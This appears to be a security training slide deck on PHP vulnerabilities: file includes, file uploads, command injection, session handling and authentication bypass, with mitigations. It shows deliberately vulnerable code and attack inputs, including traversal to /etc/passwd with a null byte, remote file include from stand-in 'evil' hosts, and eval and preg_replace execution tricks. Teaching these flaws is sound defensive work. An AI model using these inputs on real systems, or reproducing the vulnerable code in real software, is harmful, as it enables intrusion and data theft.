Date post: | 31-Mar-2015 |
Category: |
Documents |
Upload: | jace-greenwell |
View: | 212 times |
Download: | 0 times |
©Copyright Justin C. Klein Keane
PHP Vulnerability Potpourri
File Include, Command Injection & Authentication Bypass Vulnerabilities
©Copyright Justin C. Klein Keane
File Include Vulnerabilities
Arbitrary file includes (reading) Local file includes Remote file includes
Directory traversal Writing arbitrary files
©Copyright Justin C. Klein Keane
Basic PHP File Includes
Four common functions include()
include_once()
require()
require_once()
Difference is that require will die (with fatal E_ERROR) if the specified file is not found
Include() will produce an E_WARNING _once functions will not re-include the file if it has
already been called
©Copyright Justin C. Klein Keane
How Includes Work
When PHP includes a file it will parse any PHP code within that file
Anything not delimited with the PHP delimiters (“<?php” and “?>”) will be treated as plain text
Plain text will simply be rendered inline
©Copyright Justin C. Klein Keane
Typical Include
<?php
include_once('header.php');
include_once($_GET['action'] . '.php');
include_once('footer.php');
?>
©Copyright Justin C. Klein Keane
Problems with Includes
Arbitrary local file includes triggered via malicious user input:
<?phpinclude_once('inc/'.$_GET['action']);
?>
If user supplies “../../../../../../../etc/passwd” as the 'action' URL variable that file will be rendered during page display!
©Copyright Justin C. Klein Keane
Incorrect Projection Schemes
Some programmers will append a file extension to attempt to limit includes like /etc/passwd
<?phpinclude('inc/'.$_GET['action'].'.php');
?>
This fails for several reasons, one is because PHP is written in C
©Copyright Justin C. Klein Keane
Caveats of C
C doesn't have a string type
Instead strings are null terminated character arrays:char foo[3];int main() {
foo[0] = 'B';foo[1] = 'A';foo[2] = 'R';foo[3] = '\0';
}
Without the null at the end the “string” would have no end
C reads from the start of the string until it reaches the null character when printing strings
©Copyright Justin C. Klein Keane
Tricking PHP with C Conventions
Using a null character triggers C constructs and defeats the prior example
If user passes in:action=../../../../../../etc/passwd%00
then PHP executes:include('inc/../.././../../etc/passwd');
Because PHP terminates the string at the null bit (and ignores the appended '.php')
Most PHP programmers are unaware of this!
©Copyright Justin C. Klein Keane
Other Include Strategies
There are other ways around extension protections
<?phpinclude('inc/'.$_GET['action'].'.php');
?>
Attacker can provide the GET var:?action=/path/to/other/php_file.php?
renders the final “.php” as a GET var to the included php_file.php
©Copyright Justin C. Klein Keane
Other Dangers of Includes
Often times include files are meant to be included, not directly referenced
Include files live on the filesystem May contain vulnerabilities when called directly
as variables could be redefined or arbitrarily defined
Especially dangerous when register_globals is on!
©Copyright Justin C. Klein Keane
Example
Main file:<?php
$style_dir='images/';include_once('header.php');
[...]
Include file:<html><head>
<title>Foo Site</title><style type=”text/css”>
@import url(“<?php echo $style_dir;?>style.css”);</head><body>
What happens when an attacker calls:http://sitename.tld/header.php?style_dir=http://myEvilSite.tld/css/
©Copyright Justin C. Klein Keane
Remote File Include
Rather than specifying a local resource, an attacker could specify a remote file for inclusion
Remote files must be served as plain text, rather than compiled PHP
Remote text is pulled for inclusion then the local PHP compiler interprets the text, rendering the PHP locally
©Copyright Justin C. Klein Keane
Remote File Include Requirements
/etc/php.ini has parameters that define the ability of PHP to include files:
;;;;;;;;;;;;;;;;;;; Fopen wrappers ;;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// orftp://) as files.
allow_url_fopen = On
©Copyright Justin C. Klein Keane
If allow_url_fopen is On
Attackers can include remote files:
<?phpinclude_once($_GET['action'] . '.php');
?>
Attacker can call
?action=http://evilSite.tld/evil_script.txt?
©Copyright Justin C. Klein Keane
Other Include Strategies
Attackers can use includes to bypass direct access restrictions such as .htaccess
This could be used to expose files like config.ini files Attackers can include Apache files like .htpasswd
or .htaccess files which are included as plain text, exposing their contents
Attackers can subvert program flow by calling files that are normally not included
Attackers can call files readable by Apache, such as files in /tmp which may contain sensitive data (like session cookies or malicious uploads)
©Copyright Justin C. Klein Keane
Writing Files
PHP functionality used to write files include: File upload functions built into an application
(such as image uploads) Utilizing PHP filesystem commands such as
fwrite()
©Copyright Justin C. Klein Keane
Typical Image Upload Handler
$upload_dir = "files/";$filename = basename($_FILES['form_filename']['name']);
$target = $upload_dir . $filename;
if(move_uploaded_file($_FILES['form_filename']['tmp_name'], $target)) { echo $filename . " has been uploaded";} else{
echo "Error uploading file!";}
©Copyright Justin C. Klein Keane
Common Upload Errors
Collisions cause overwrites File type is not checked
Programmer may assume only image files are being uploaded, but this isn't enforced
File type is checked inappropriately Simply checking $_FILES['upload_file']['type'] is
insufficient since this is a browser provided parameter
Double extensions (and programmer only check the first one)
©Copyright Justin C. Klein Keane
Exploits for File Uploads
Attacker uploads a PHP file which contains a backdoor or exposes other system files
Attacker uploads a .htaccess file overwriting Apache rules
Attacker overwrites existing files to insert a backdoor
©Copyright Justin C. Klein Keane
Fwrite()
The fwrite() function is a built in function that allows Apache to write to file handles
Often used in installers to write config files Also commonly used for logging For more information see:
http://us3.php.net/manual/en/function.fwrite.php
What is Command Injection
Also known as arbitrary code execution Attacker injects malicious input that is then
passed to functions that execute shell commands based on the input
Typical Example
<?php
if (isset($_GET['file']) {
system('rm ' . $_GET['file'] '.php');
}
?>
Developer hopes to delete a specific PHP file, but the intent of the command is easily bypassed
Injection Strategies
Shell commands are delimited by a semi-colon, so multiple commands can be chained together
The pound or hash (#) symbol denotes the beginning of a comment on the shell, any text following it will be ignored
Strategies similar to SQL injection can be utilized
Functions to Watch
Luckily, the list of commands which execute via a shell is somewhat limited:
system() Executes the command and returns output
exec() Executes command, can populate PHP
variables with output and return values passthru()
Executes command but only returns return status
Other Dangerous Functions
There are other, less common functions to watch out for
Backtick operators $retval = `ls -lh *.php`;
shell_exec() Same as backtick
Pipe Operations
PHP has commands that can open a pipe to a process, so input and output can be directed to the process
popen() and pclose() $proc = popen(“/bin/ls”, “r”);
proc_open() Offers more command control
Command Sanitization
PHP has two commands that can be used to scrub input before passing it to a command
escapeshellarg() Adds quotes around string and escapes any
internal quotes escapeshellcmd()
Escapes all special characters that could be used to interrupt or override execution flow
Note that you should still strive to sanitize to “known good” commands
Other Nefarious Outliers
preg_replace with the /e flag allows for command execution
<?php
print preg_replace('/(.*)/e', 'strtoupper("\\1")', '{${phpinfo()}}');
?>
This is certainly not the first place you would look to find command execution!
Executing PHP Commands
Using the eval() command Because of PHP's dynamic nature, variables
can actually be interpreted as commands:<?php
$x = “echo exec('cat /etc/passwd');”;
eval($x);
?>
Mitigation
PHP's php.ini contains a rarely used directive:
; This directive allows you to disable certain functions for security reasons.; It receives a comma-delimited list of function names. This directive is; *NOT* affected by whether Safe Mode is turned On or Off.disable_functions = exec, system, passthru, eval
Won't completely cut off avenues of attack but can limit the programmers power to introduce vulnerabilities
No way to limit backticks via php.ini
©Copyright Justin C. Klein Keane
Auth Bypass
Authentication bypass is a vulnerability that allows an attacker to gain access to functionality without providing valid credentials
Attackers may seek to steal an authenticated users session
May also be possible to initiate a privileged session without credentials
Some functionality may not need a session
©Copyright Justin C. Klein Keane
Session Handling
PHP controls “session” data via a PHPSESSID cookie by default (defined in php.ini)
©Copyright Justin C. Klein Keane
Session Cookies
Difficult to predict/guess However, stored on the filesystem Location determined by settings in /etc/php.ini session.save_path = "/var/lib/php/session"
; Whether to use cookies. session.use_cookies = 1 ; This option enables administrators to make their users invulnerable to ; attacks which involve passing session ids in URLs; defaults to 0. ; session.use_only_cookies = 1 ; Name of the session (used as cookie name). session.name = PHPSESSID ; Initialize session on request startup. session.auto_start = 0 ; Lifetime in seconds of cookie or, if 0, until browser is restarted. session.cookie_lifetime = 0 ; The path for which the cookie is valid. session.cookie_path = / ; The domain for which the cookie is valid. session.cookie_domain =
©Copyright Justin C. Klein Keane
Permissions on Session Dir
# ls -lah /var/lib/phptotal 156K
drwxr-xr-x 3 root root 4.0K Jun 2 12:13 .drwxr-xr-x 21 root root 4.0K Jun 2 12:42 ..drwxrwx--- 2 root apache 132K Jun 22 14:37 session
Note that apache can read and write in this directory
©Copyright Justin C. Klein Keane
phpinfo() Disclosure
©Copyright Justin C. Klein Keane
Data Can be Leaked
If attacker can leverage webapp to list the cookie directory they can modify their own cookies
Cookie isn't tied to an IP, so cookie holder automatically gains session access
Cookie can also be stolen from the end user JavaScript can access cookies with domain
restrictions
©Copyright Justin C. Klein Keane
Logical Flaws
Application fails to check credentials properly Name collisions for instance These will not be programming errors so are
much more difficult to detect
©Copyright Justin C. Klein Keane
Limited Authentication
Application may only check for authentication in one place
Some files may assume that authentication has taken place but may be accessible outside of that flow
©Copyright Justin C. Klein Keane
Brute Force
Steps should be taken to limit authentication attempts
At the very least log auth attempts and alert someone on multiple failures
Be sure to limit login failure feedback (don't alert an attacker to whether or not a username or password exists)
Be wary of password recovery functionality and information it might disclose to an attacker
©Copyright Justin C. Klein Keane
Logout Failure
Applications that don't properly end sessions could leave them open for exploitation
Kiosks or other public terminals are prime offenders in these circumstances
©Copyright Justin C. Klein Keane
Unencrypted Authentication
Cookies and/or post data may be stolen Forms themselves should be encrypted, not just
their post targets MITM plain text keystroke loggers could be
utilized on unencrypted login forms
©Copyright Justin C. Klein Keane
Information Disclosure
There are many seemingly innocuous ways that information valuable to an attacker can be disclosed
Debugging messages phpinfo() output can reveal configuration informaiton Plain text files such as .ini or .htaccess or .htpasswd
files could be exposed Directory listing could show files that would otherwise
be difficult to find HTML comments
©Copyright Justin C. Klein Keane
Exposed Information
Assume any web accessible file can be read by an attacker
Tools for brute force guessing filenames and directories exist
Look at include files to make sure they can't be abused by being called directly